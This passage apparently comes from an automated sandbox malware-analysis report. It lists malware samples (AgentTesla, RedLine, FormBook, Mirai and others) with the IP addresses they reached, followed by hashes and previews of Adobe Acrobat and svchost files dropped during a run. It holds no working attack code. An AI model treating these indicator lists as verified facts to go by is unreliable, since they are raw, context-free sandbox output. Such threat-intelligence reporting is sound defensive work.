                                                                                                      B2Vk4v7bt3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 195.201.175.19
                                                                                                      hrIeL2PVyr.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 49.13.89.187
                                                                                                      oI7VSX6vxQ.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 49.13.89.187
                                                                                                      Setup.exeGet hashmaliciousVidarBrowse
                                                                                                      • 159.69.101.193
                                                                                                      DHL STATEMENT 009##22.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 195.201.175.19
                                                                                                      DEKONT-14-02-2024-98766789098765456789876567898765678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      #U0111#U01a1n h#U00e0ng m#U1edbi pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 88.99.216.183
                                                                                                      DEKONT-14-02-2024-98766789098765456789876567898765678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      ANONYMIZEEpikNetworkCHH0rLDuLHwH.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 91.149.192.19
                                                                                                      Factura-24076787026878.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 45.88.186.126
                                                                                                      Cqqjbi.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 45.88.186.126
                                                                                                      Alej.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 45.88.186.126
                                                                                                      CaixaBank _ banca digital CaixaBankNow45450-09898965621.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 45.88.186.126
                                                                                                      Enquire_2455.xlsGet hashmaliciousFormBookBrowse
                                                                                                      • 185.83.214.222
                                                                                                      rABD8JRNR3.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 45.88.186.20
                                                                                                      hsfEMY1sZ2.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 185.83.214.222
                                                                                                      tu3aBt48sy.exeGet hashmaliciousAsyncRATBrowse
                                                                                                      • 45.88.186.145
                                                                                                      DLVJ4NYs0j.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 45.88.186.145
                                                                                                      AKAMAI-ASUShttp://maxcdn.bootstrapcdn.cloudGet hashmaliciousUnknownBrowse
                                                                                                      • 23.79.56.153
                                                                                                      Approved Statement From Thomas Garza Photography (181 KB).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 23.49.5.145
                                                                                                      bF1ZLRyRM4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 23.74.163.254
                                                                                                      SecuriteInfo.com.Win32.TrojanX-gen.1905.22029.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                      • 23.49.5.148
                                                                                                      EES Offer VT.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 23.54.200.159
                                                                                                      pF4qvp3MTb.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                      • 23.49.5.148
                                                                                                      acQQDjNOw8.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                      • 23.49.5.145
                                                                                                      IXPFqwlkuB.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 23.213.140.182
                                                                                                      https://steamproxy.vip/?subsection=reviewsGet hashmaliciousUnknownBrowse
                                                                                                      • 23.4.32.216
                                                                                                      https://steamproxy.vip/?subsection=videosGet hashmaliciousUnknownBrowse
                                                                                                      • 23.50.120.64
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0e50AsBVCga6.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 144.76.136.153
                                                                                                      50AsBVCga6.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 144.76.136.153
                                                                                                      QxmpW2qh1f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      B2Vk4v7bt3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      hrIeL2PVyr.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 144.76.136.153
                                                                                                      INVFEB142024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 144.76.136.153
                                                                                                      oI7VSX6vxQ.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 144.76.136.153
                                                                                                      #U00c7ankaya #U00dcniversitesi, TEKL#U0130F 12.02.24.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      103_1000RT0382400029_2034090349.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):1.307371745775727
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrT:KooCEYhgYEL0In
                                                                                                      MD5:FD4C2787C0F093098FEFD1F6C45EA590
                                                                                                      SHA1:B2878F58486D271BC2382136B9E21CD4C8BB0532
                                                                                                      SHA-256:CDB9ADCEB44060CE58EAC6CAC6AACE95B488CF885706743DF462F0D6FEDA5D02
                                                                                                      SHA-512:EFE9101FA988ACE4962B320A5DF38A75C5994795DBE8B010385B981821A7543E8F6CBB1FEDB91E8A655BE25CF70F4EEE0140D4D1B2D6AAB1C7B221965CFA649D
                                                                                                      Malicious:false
                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc2f6ea1d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.4221476543209927
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                                      MD5:A517D16FE5DD362F54236CF0EADD5DEC
                                                                                                      SHA1:F9065EB07D666BC7980BEC98D8CABAE9840FF25A
                                                                                                      SHA-256:AFC2BD02B7BA4CF65B230DA8E8ED1D28EECDE194B2D5472D9F400633FEFA92D0
                                                                                                      SHA-512:4DE1D10E8514C9DA0C2641B0B44AD9F06CDBD4FBE610865288CD6FF33564331CD30598F59026A512B0315FC00EBF9138C73A53DE3C065F65845E54CFD818A710
                                                                                                      Malicious:false
                                                                                                      Preview:....... .......A.......X\...;...{......................0.!..........{A.9....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................ijA9....|+.................TB.B9....|+..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.07699262232796628
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:OltKYerfqZClhvejjn13a/kcZCtlAllcVO/lnlZMxZNQl:KtKzrfjhGj53qMAOewk
                                                                                                      MD5:C85848BDA5A9E1786A85CE16B6E8F1FA
                                                                                                      SHA1:C26C823301486052B1EFE38E3BCEA3B57326F8DD
                                                                                                      SHA-256:34CCD1111AE7A3A2049C3DC70C1BD5ADBAF6793B93E759D978AADF08F073A0BA
                                                                                                      SHA-512:87BB6E2A41E2AD6CA749CF9344688E60436EAFE275FBB1DB66700F08104A0A6871177765257C14E3AB9102A56FA6FC9E3C540647F822B12CBA814F522AB60D84
                                                                                                      Malicious:false
                                                                                                      Preview:g.t@.....................................;...{..9....|+......{A..............{A......{A..........{A]................TB.B9....|+.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):292
                                                                                                      Entropy (8bit):5.166789542949743
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEPSVq2Pwkn2nKuAl9OmbnIFUt8XhE5UzgZmw+XhE5UzIkwOwkn2nKuAl9Ombjd:aiqVvYfHAahFUt8Xi5Uzg/+Xi5UzI5JK
                                                                                                      MD5:C968EC7870DE662043F9E9A5E5B72A1F
                                                                                                      SHA1:CA65F996E6E89A9D47001DFD562A6845678BBC2B
                                                                                                      SHA-256:30A09B52FF944FDC5B9B11C28142AB6307F04720C2B8FEEEDD505AFAFFC79A18
                                                                                                      SHA-512:B4FC7A0DABC5091C05C30F5D9EA0CCBD5359BDA68319BD319C7982727D089A7979BE9C0BA1AE9D66A9FC668806D104C447E6BF725EDE0F9AD94C40A7D8FD3567
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.019 1fe4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/15-06:28:01.020 1fe4 Recovering log #3.2024/02/15-06:28:01.020 1fe4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):292
                                                                                                      Entropy (8bit):5.166789542949743
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEPSVq2Pwkn2nKuAl9OmbnIFUt8XhE5UzgZmw+XhE5UzIkwOwkn2nKuAl9Ombjd:aiqVvYfHAahFUt8Xi5Uzg/+Xi5UzI5JK
                                                                                                      MD5:C968EC7870DE662043F9E9A5E5B72A1F
                                                                                                      SHA1:CA65F996E6E89A9D47001DFD562A6845678BBC2B
                                                                                                      SHA-256:30A09B52FF944FDC5B9B11C28142AB6307F04720C2B8FEEEDD505AFAFFC79A18
                                                                                                      SHA-512:B4FC7A0DABC5091C05C30F5D9EA0CCBD5359BDA68319BD319C7982727D089A7979BE9C0BA1AE9D66A9FC668806D104C447E6BF725EDE0F9AD94C40A7D8FD3567
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.019 1fe4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/15-06:28:01.020 1fe4 Recovering log #3.2024/02/15-06:28:01.020 1fe4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):336
                                                                                                      Entropy (8bit):5.143293980963934
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEBOq2Pwkn2nKuAl9Ombzo2jMGIFUt8XhEHZmw+XhEVkwOwkn2nKuAl9Ombzo23:aiBOvYfHAa8uFUt8XiH/+XiV5JfHAa8z
                                                                                                      MD5:0616FFA13CD26266593173CD7DB7AF48
                                                                                                      SHA1:192C3EB0660DAB87AB3ED3773AAD6A40576CB50E
                                                                                                      SHA-256:664A98182DF2B05B326BC7E6E80FD791E43909253954E9C33A9E7753431A9897
                                                                                                      SHA-512:D3AF13AA7245BA7914A47594D159269C1995D9AB82FB172C9C151FB4B6368BEA949AA5108DD83AA1BC81D9AEA9964E524319ACD26F356C9FF15E58CFB308C7C5
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.064 1cd0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/02/15-06:28:01.066 1cd0 Recovering log #3.2024/02/15-06:28:01.066 1cd0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):336
                                                                                                      Entropy (8bit):5.143293980963934
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEBOq2Pwkn2nKuAl9Ombzo2jMGIFUt8XhEHZmw+XhEVkwOwkn2nKuAl9Ombzo23:aiBOvYfHAa8uFUt8XiH/+XiV5JfHAa8z
                                                                                                      MD5:0616FFA13CD26266593173CD7DB7AF48
                                                                                                      SHA1:192C3EB0660DAB87AB3ED3773AAD6A40576CB50E
                                                                                                      SHA-256:664A98182DF2B05B326BC7E6E80FD791E43909253954E9C33A9E7753431A9897
                                                                                                      SHA-512:D3AF13AA7245BA7914A47594D159269C1995D9AB82FB172C9C151FB4B6368BEA949AA5108DD83AA1BC81D9AEA9964E524319ACD26F356C9FF15E58CFB308C7C5
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.064 1cd0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/02/15-06:28:01.066 1cd0 Recovering log #3.2024/02/15-06:28:01.066 1cd0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):475
                                                                                                      Entropy (8bit):4.961707082376852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YH/um3RA8sqZAFGsBdOg2HgAcaq3QYiubInP7E4T3y:Y2sRds9LdMH63QYhbG7nby
                                                                                                      MD5:5394F6118E1AD9A1E7DC6457F80F2C91
                                                                                                      SHA1:D343863347DD4B5F90E4128CFC7D13992D189D89
                                                                                                      SHA-256:BEEB8D143D4D1897C8615043F2E64694D4A3788781002CF96B2715F8A61B8361
                                                                                                      SHA-512:DB383A39ED4A24BDB456677FD4BC65B12A8B4EF403E5987D995F36A400FF47B93B7310D870D13B1E3C3D09C9757E32DBA5818732835FC8573CA2D726D337DA23
                                                                                                      Malicious:false
                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13352534892998642","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118764},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:modified
                                                                                                      Size (bytes):475
                                                                                                      Entropy (8bit):4.961707082376852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YH/um3RA8sqZAFGsBdOg2HgAcaq3QYiubInP7E4T3y:Y2sRds9LdMH63QYhbG7nby
                                                                                                      MD5:5394F6118E1AD9A1E7DC6457F80F2C91
                                                                                                      SHA1:D343863347DD4B5F90E4128CFC7D13992D189D89
                                                                                                      SHA-256:BEEB8D143D4D1897C8615043F2E64694D4A3788781002CF96B2715F8A61B8361
                                                                                                      SHA-512:DB383A39ED4A24BDB456677FD4BC65B12A8B4EF403E5987D995F36A400FF47B93B7310D870D13B1E3C3D09C9757E32DBA5818732835FC8573CA2D726D337DA23
                                                                                                      Malicious:false
                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13352534892998642","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118764},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4320
                                                                                                      Entropy (8bit):5.255056762753408
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo721fg:etJCV4FiN/jTN/2r8Mta02fEhgO73gof
                                                                                                      MD5:47391B993A22E7904F5AB11230238D77
                                                                                                      SHA1:0CC7419EF0D769F031DE85962753665370515E77
                                                                                                      SHA-256:2AC67A8252B8CF8A3C90D204C85BBB9A34A9637F1D2BFCAEAFB867EDDEC9D41D
                                                                                                      SHA-512:5BC5AFC8D393521F3F810A4660221DA02E1D2DC8EF14CE0F743BD0B998175E3495877B1D3603D7858BEA517AD18278CA2EF427F25C81F03EFAB45EA6528BD5A6
                                                                                                      Malicious:false
                                                                                                      Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):324
                                                                                                      Entropy (8bit):5.169292943995828
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEGKq2Pwkn2nKuAl9OmbzNMxIFUt8XhEFphZmw+XhEGtFkwOwkn2nKuAl9OmbzE:aiGKvYfHAa8jFUt8XiPh/+Xie5JfHAab
                                                                                                      MD5:0E2E3461A8626994CC1932B274E16605
                                                                                                      SHA1:DF63FEA885B325062E4CFFB542F826795B128D58
                                                                                                      SHA-256:AD29405E345A6654649759CD70FEDEAE436E7FE6413B4F472DE3031363002604
                                                                                                      SHA-512:DC62784C169D32E37869996BF0EBDF730CEAFA9D70B92C8E56E4237B48E3F4849088A460B3576006A335AC1684086F1C0524AAF2D03F58373C7A544F0A16C79B
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.421 1cd0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/02/15-06:28:01.446 1cd0 Recovering log #3.2024/02/15-06:28:01.458 1cd0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):324
                                                                                                      Entropy (8bit):5.169292943995828
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:ahEGKq2Pwkn2nKuAl9OmbzNMxIFUt8XhEFphZmw+XhEGtFkwOwkn2nKuAl9OmbzE:aiGKvYfHAa8jFUt8XiPh/+Xie5JfHAab
                                                                                                      MD5:0E2E3461A8626994CC1932B274E16605
                                                                                                      SHA1:DF63FEA885B325062E4CFFB542F826795B128D58
                                                                                                      SHA-256:AD29405E345A6654649759CD70FEDEAE436E7FE6413B4F472DE3031363002604
                                                                                                      SHA-512:DC62784C169D32E37869996BF0EBDF730CEAFA9D70B92C8E56E4237B48E3F4849088A460B3576006A335AC1684086F1C0524AAF2D03F58373C7A544F0A16C79B
                                                                                                      Malicious:false
                                                                                                      Preview:2024/02/15-06:28:01.421 1cd0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/02/15-06:28:01.446 1cd0 Recovering log #3.2024/02/15-06:28:01.458 1cd0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                      Category:dropped
                                                                                                      Size (bytes):86016
                                                                                                      Entropy (8bit):4.445048140002208
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:yezci5tkiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rTs3OazzU89UTTgUL
                                                                                                      MD5:A0C62585F58F8DFE89B8DD06112FB9D1
                                                                                                      SHA1:A575DA254F43C753AB5BD60AA3588E97E1C82508
                                                                                                      SHA-256:D6331E9885C37D9EB5E9CBD8EA2F32E90103DF652238F9356B61C69A3DB91DFC
                                                                                                      SHA-512:0D08B10BDFEA3CE85130BE27C445AEA21BB29B7750905DC367D51DA2EA2FE6050B0B8E0A3BEDAC3FCDBE342B4A9E8DF377E70F0CFD6BA3CE1D3F3A593946738E
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:SQLite Rollback Journal
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8720
                                                                                                      Entropy (8bit):3.7748341761536097
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:7Mwp/E2ioyV2ioy9oWoy1Cwoy1aKOioy1noy1AYoy1Wioy1hioybioyUoy1noy1D:7rpju2FpXKQZ8b9IVXEBodRBku
                                                                                                      MD5:CB126BDFD123765825BDE469DA7F6BE1
                                                                                                      SHA1:6550D735356249559F232170ECCDC4477E47823F
                                                                                                      SHA-256:EF317685B2904FE27D98887C1B0032A696491D446B1274ECB0BCB172477F9729
                                                                                                      SHA-512:9192DBDDD4956D742CCBAFDF27275DFC3187BAA4547222E75BB968779605386036AC3F55DCD58B16900502DCA37483BB64CE12F646EF4940E121CC4123BBC320
                                                                                                      Malicious:false
                                                                                                      Preview:.... .c......-.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):295
                                                                                                      Entropy (8bit):5.359622255957787
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJM3g98kUwPeUkwRe9:YvXKXEY8K8Zc0vR8ZGMbLUkee9
                                                                                                      MD5:089318991F2C0FBFBA55084CF3E46525
                                                                                                      SHA1:AAB63FFADCDE6F346BE338CC3199A1372FBB1259
                                                                                                      SHA-256:9D07420BEC8696756041DE1A1A446400CA99A9E5622C3BC5D1E254F27061EE6C
                                                                                                      SHA-512:16A2BFF319E67F7468C6C428229BA3E5B7892FB4709C6052D55EDD6B6D553443D4B1C45D8B2492619A1CB3DD6FF59AB1EC43C089128F2C1906300D8ACA35A350
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):294
                                                                                                      Entropy (8bit):5.3087489280724025
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfBoTfXpnrPeUkwRe9:YvXKXEY8K8Zc0vR8ZGWTfXcUkee9
                                                                                                      MD5:D37F1737DA6F2B4E898858E41AADBEF4
                                                                                                      SHA1:FD7C857E4AB946C1E9CFA3BB95A8B1B298221737
                                                                                                      SHA-256:18978AD28187C5B8352CF68EF2BBAAA8849960615F19E7ED1C8E20BF8D65B97E
                                                                                                      SHA-512:9B39161D98C38090B263A45C92D87E63EBCA2952D51954A85E44776B131B79A408A486F469498413A4DB42D6D30A1ED174393AC8989975DABFCE70ACC5997BF1
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):294
                                                                                                      Entropy (8bit):5.286509998444228
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfBD2G6UpnrPeUkwRe9:YvXKXEY8K8Zc0vR8ZGR22cUkee9
                                                                                                      MD5:458E6167660A810FD55AF78CEC1F0402
                                                                                                      SHA1:985E1198E8BA92D9259B1A0C125B1E50E3357431
                                                                                                      SHA-256:CC098C34DA8104F874D44BB8323A6F0B082E3F575A28775F83D0D179DD27E4E0
                                                                                                      SHA-512:392850B9D237B576AAFAC61C1ED25B264FE9CBE91B4B65E9B9151AB5F2610ACD9F91B5C145E069F74F3EE75DC702B8CF26C623DBB634EC1A9EDCD54339637133
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):285
                                                                                                      Entropy (8bit):5.346501494421037
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:YEQXJ2HXEYHcK1HVoZcg1vRcR0YgI52EeoAvJfPmwrPeUkwRe9:YvXKXEY8K8Zc0vR8ZGH56Ukee9
                                                                                                      MD5:C00C6107FF0ADC8EE443B0C75DA02CF5
                                                                                                      SHA1:73548E01286DE780033296504B24400D5A2B4DFB
                                                                                                      SHA-256:618DA666C5191E745895A0BC4C6D56629505F4012E445EDC03CC880D869FADA2
                                                                                                      SHA-512:D2CCA3786311EA8369B8068FC912085640020B0E4C77B6426D2E203C8AAC5E0B52A0301B51BC467ED5E013648ABE3FBC27E3015E53BB414272E0F8EF4C335DAD
                                                                                                      Malicious:false
                                                                                                      Preview:{"analyticsData":{"responseGUID":"e6bb8b82-b260-4fdc-9666-b8ccb2763cea","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1708150595644,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1255
                                                                                                      Entropy (8bit):5.698635563262268
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yv6XEY8lzva+pLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3Hu:YvxThgnvjRrNTB5OJhABks8c2Hu
                                                                                                      MD5:B69CADF290179982D0802B0BBA398FB3
                                                                                                      SHA1:8054E0F835DAD125C10B118F654709A7E002D3A9
